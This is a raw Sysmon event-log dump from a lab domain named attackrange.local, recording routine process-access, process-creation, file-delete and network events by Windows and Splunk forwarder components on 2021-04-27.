12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291705Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291704Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291703Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291702Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291701Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291700Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291699Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291698Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291697Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-0279-6088-002A-00000000BB01}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291696Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-0279-6088-002A-00000000BB01}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000291695Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.246{BEA10069-0279-6088-002A-00000000BB01}6964C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{BEA10069-D0C1-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000291694Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553302E81E1B3ECB47C8F957DACED1B4,SHA256=907D9F0F6D909AB950D2DDAECC33B6792068A4A8C44B9CA61A443A3BF2F2AB84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291693Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:25.244{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED8FF5B5A035B4FA3F9A1955A0BE1013,SHA256=CA259C1351DD4B1236FED512CE5A03B87EFCD3CCB1415C8FE9A21B66312FD58F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440591Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:25.209{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440590Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:25.209{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000291737Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:24.471{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50628-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000291736Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D13E-6086-9D00-00000000BB01}17281968C:\Windows\system32\conhost.exe{BEA10069-027A-6088-022A-00000000BB01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291735Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291734Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291733Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291732Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291731Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291730Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291729Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291728Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291727Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C2-6086-0C00-00000000BB01}7286592C:\Windows\system32\svchost.exe{BEA10069-D0C3-6086-1E00-00000000BB01}1984C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291726Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D0C1-6086-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{BEA10069-027A-6088-022A-00000000BB01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000291725Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:26.577{BEA10069-D13E-6086-9900-00000000BB01}4082600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BEA10069-027A-6088-022A-00000000BB01}6628C:\Program 